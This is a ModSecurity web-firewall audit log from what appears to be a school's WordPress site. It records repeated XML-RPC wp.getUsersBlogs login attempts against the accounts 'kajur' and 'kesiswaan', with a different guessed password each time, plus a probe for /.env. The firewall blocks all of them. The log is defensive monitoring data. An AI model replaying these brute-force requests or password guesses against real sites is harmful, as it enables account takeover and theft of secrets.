182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --436cb05b-C-- wp.getUsersBlogs kajur pepper --436cb05b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --436cb05b-E-- --436cb05b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080323956672 5280 (- - -) Stopwatch2: 1745080323956672 5280; combined=3736, p1=465, p2=3103, p3=0, p4=0, p5=99, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --436cb05b-Z-- --c878b255-A-- [19/Apr/2025:23:33:06 +0700] aAPQQnNa4dA2HllpK_Pn3wAAAI0 103.236.140.4 39752 103.236.140.4 8181 --c878b255-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c878b255-C-- wp.getUsersBlogs kajur jackson --c878b255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c878b255-E-- --c878b255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080386529605 16858 (- - -) Stopwatch2: 1745080386529605 16858; combined=27864, p1=439, p2=3049, p3=0, p4=0, p5=12203, sr=86, sw=77, l=0, gc=12096 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c878b255-Z-- --6ea49330-A-- [19/Apr/2025:23:34:08 +0700] aAPQgA6cTFSgLAHl7PpPSQAAAAU 103.236.140.4 40066 103.236.140.4 8181 --6ea49330-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6ea49330-C-- wp.getUsersBlogs kajur lovely --6ea49330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ea49330-E-- --6ea49330-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080448433403 6181 (- - -) Stopwatch2: 1745080448433403 6181; combined=4294, p1=525, p2=3524, p3=0, p4=0, p5=138, sr=93, sw=107, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ea49330-Z-- --14a3935b-A-- [19/Apr/2025:23:35:09 +0700] aAPQvevDiFC_ir7MDwZTFQAAAEo 103.236.140.4 40394 103.236.140.4 8181 --14a3935b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --14a3935b-C-- wp.getUsersBlogs kajur olivia --14a3935b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14a3935b-E-- --14a3935b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080509483357 5950 (- - -) Stopwatch2: 1745080509483357 5950; combined=4082, p1=521, p2=3386, p3=0, p4=0, p5=103, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14a3935b-Z-- --2cd1fa3c-A-- [19/Apr/2025:23:36:10 +0700] aAPQ-nNa4dA2HllpK_PoPAAAAIo 103.236.140.4 40706 103.236.140.4 8181 --2cd1fa3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2cd1fa3c-C-- wp.getUsersBlogs kajur myspace1 --2cd1fa3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2cd1fa3c-E-- --2cd1fa3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080570905968 5884 (- - -) Stopwatch2: 1745080570905968 5884; combined=4108, p1=537, p2=3383, p3=0, p4=0, p5=111, sr=91, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cd1fa3c-Z-- --463c1073-A-- [19/Apr/2025:23:37:18 +0700] aAPRPkruoUXZj665VUFzQAAAANE 103.236.140.4 41038 103.236.140.4 8181 --463c1073-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --463c1073-C-- wp.getUsersBlogs kesiswaan admin --463c1073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --463c1073-E-- --463c1073-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080638123102 4935 (- - -) Stopwatch2: 1745080638123102 4935; combined=3730, p1=462, p2=3089, p3=0, p4=0, p5=104, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --463c1073-Z-- --3aca805b-A-- [19/Apr/2025:23:38:19 +0700] aAPRe3Na4dA2HllpK_PoXgAAAIY 103.236.140.4 41314 103.236.140.4 8181 --3aca805b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3aca805b-C-- wp.getUsersBlogs kesiswaan kesiswaan@2020 --3aca805b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3aca805b-E-- --3aca805b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080699927292 5241 (- - -) Stopwatch2: 1745080699927292 5241; combined=3823, p1=439, p2=3216, p3=0, p4=0, p5=98, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aca805b-Z-- --d2d80125-A-- [19/Apr/2025:23:39:22 +0700] aAPRug6cTFSgLAHl7PpPfwAAAAo 103.236.140.4 41620 103.236.140.4 8181 --d2d80125-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d2d80125-C-- wp.getUsersBlogs kesiswaan 1qazxsw2 --d2d80125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2d80125-E-- --d2d80125-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080762487967 5204 (- - -) Stopwatch2: 1745080762487967 5204; combined=3812, p1=458, p2=3178, p3=0, p4=0, p5=103, sr=100, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2d80125-Z-- --3163232a-A-- [19/Apr/2025:23:39:50 +0700] aAPR1nNa4dA2HllpK_PomAAAAI0 103.236.140.4 41746 103.236.140.4 8181 --3163232a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --3163232a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3163232a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745080790135423 684 (- - -) Stopwatch2: 1745080790135423 684; combined=283, p1=246, p2=0, p3=0, p4=0, p5=36, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3163232a-Z-- --b9407134-A-- [19/Apr/2025:23:40:23 +0700] aAPR90ruoUXZj665VUFzaQAAANY 103.236.140.4 41912 103.236.140.4 8181 --b9407134-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b9407134-C-- wp.getUsersBlogs kesiswaan Beast3x@8*#4@! --b9407134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9407134-E-- --b9407134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080823301577 5952 (- - -) Stopwatch2: 1745080823301577 5952; combined=4000, p1=480, p2=3347, p3=0, p4=0, p5=103, sr=93, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9407134-Z-- --5700c234-A-- [19/Apr/2025:23:41:24 +0700] aAPSNHNa4dA2HllpK_PoxgAAAIc 103.236.140.4 42200 103.236.140.4 8181 --5700c234-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5700c234-C-- wp.getUsersBlogs kesiswaan kesiswaan1984 --5700c234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5700c234-E-- --5700c234-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080884453232 5814 (- - -) Stopwatch2: 1745080884453232 5814; combined=4139, p1=503, p2=3451, p3=0, p4=0, p5=107, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5700c234-Z-- --359f0560-A-- [19/Apr/2025:23:42:29 +0700] aAPSdUruoUXZj665VUFzoQAAAM4 103.236.140.4 42540 103.236.140.4 8181 --359f0560-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --359f0560-C-- wp.getUsersBlogs kesiswaan 1111111111 --359f0560-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --359f0560-E-- --359f0560-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080949278165 5844 (- - -) Stopwatch2: 1745080949278165 5844; combined=4111, p1=496, p2=3428, p3=0, p4=0, p5=109, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --359f0560-Z-- --04266510-A-- [19/Apr/2025:23:43:30 +0700] aAPSsuvDiFC_ir7MDwZT_QAAAEQ 103.236.140.4 42832 103.236.140.4 8181 --04266510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --04266510-C-- wp.getUsersBlogs kesiswaan scooter --04266510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04266510-E-- --04266510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081010556498 5356 (- - -) Stopwatch2: 1745081010556498 5356; combined=3954, p1=463, p2=3303, p3=0, p4=0, p5=111, sr=88, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04266510-Z-- --c251232c-A-- [19/Apr/2025:23:44:30 +0700] aAPS7nNa4dA2HllpK_Po7gAAAJM 103.236.140.4 43128 103.236.140.4 8181 --c251232c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c251232c-C-- wp.getUsersBlogs kesiswaan Marketing2016_ --c251232c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c251232c-E-- --c251232c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081070180787 5533 (- - -) Stopwatch2: 1745081070180787 5533; combined=3928, p1=508, p2=3253, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c251232c-Z-- --e7350202-A-- [19/Apr/2025:23:45:34 +0700] aAPTLnNa4dA2HllpK_PpBAAAAIA 103.236.140.4 43456 103.236.140.4 8181 --e7350202-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e7350202-C-- wp.getUsersBlogs kesiswaan Marketing2013 --e7350202-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7350202-E-- --e7350202-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081134612735 5367 (- - -) Stopwatch2: 1745081134612735 5367; combined=4048, p1=497, p2=3372, p3=0, p4=0, p5=104, sr=88, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7350202-Z-- --6ff17765-A-- [19/Apr/2025:23:46:36 +0700] aAPTbEruoUXZj665VUFz_wAAANM 103.236.140.4 43784 103.236.140.4 8181 --6ff17765-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6ff17765-C-- wp.getUsersBlogs kesiswaan marketing2012_ --6ff17765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ff17765-E-- --6ff17765-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081196222589 5627 (- - -) Stopwatch2: 1745081196222589 5627; combined=3918, p1=513, p2=3144, p3=0, p4=0, p5=150, sr=130, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ff17765-Z-- --20bb1a09-A-- [19/Apr/2025:23:47:38 +0700] aAPTqkruoUXZj665VUF0JAAAANI 103.236.140.4 44076 103.236.140.4 8181 --20bb1a09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 